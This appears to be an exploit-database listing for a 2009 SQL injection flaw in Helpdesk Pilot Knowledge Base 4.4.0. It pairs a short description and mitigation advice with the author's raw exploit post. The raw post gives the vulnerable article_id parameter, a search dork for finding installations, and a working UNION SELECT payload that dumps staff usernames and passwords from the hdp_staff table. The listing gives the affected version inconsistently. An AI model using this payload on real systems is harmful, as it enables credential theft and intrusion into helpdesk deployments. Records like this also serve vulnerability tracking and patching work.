Helpdesk Pilot Knowledge Base SQL injection vulnerability - (article_id)

vendor:

Helpdesk Pilot Knowledge Base

by:

kaMtiEz

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: Helpdesk Pilot Knowledge Base

Affected Version From: 4.4.2000

Affected Version To: 4.4.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:helpdeskpilot:helpdesk_pilot_knowledge_base

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Helpdesk Pilot Knowledge Base SQL injection vulnerability – (article_id)

A SQL injection vulnerability exists in Helpdesk Pilot Knowledge Base version 4.4.0 and lower. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

#############################################################################
                                                                            #
[~] Helpdesk Pilot Knowledge Base SQL injection vulnerability - (article_id)#
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                              #
[~] Homepage	: http://www.indonesiancoder.com                            #
[~] Date	: Desember 29, 2009                                         #
                                                                            #
#############################################################################

[ Software Information ]

[+] Vendor : http://www.helpdeskpilot.com/
[+] Download : -
[+] version : 4.4.0 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : 1. Standard = $299.95
            2. Professional = $399.95
            3. Corporate = $499.95
[+] Location : INDONESIA - JOGJA

#############################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/knowledgebase.php?act=art&article_id=[INDONESIANCODER]

[ Exploit ]

-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+hdp_staff--

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,cimpli
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] mungkinkah semua yang dulu tlah datang menghilang ku terus bertanya engkau dimana 
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] HAPPY NEW YEAR ^_^
[+] Welcome 2010 .. lets r0x !
[+] Tukulesto : lets make it better ,, soon .. :P~~

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM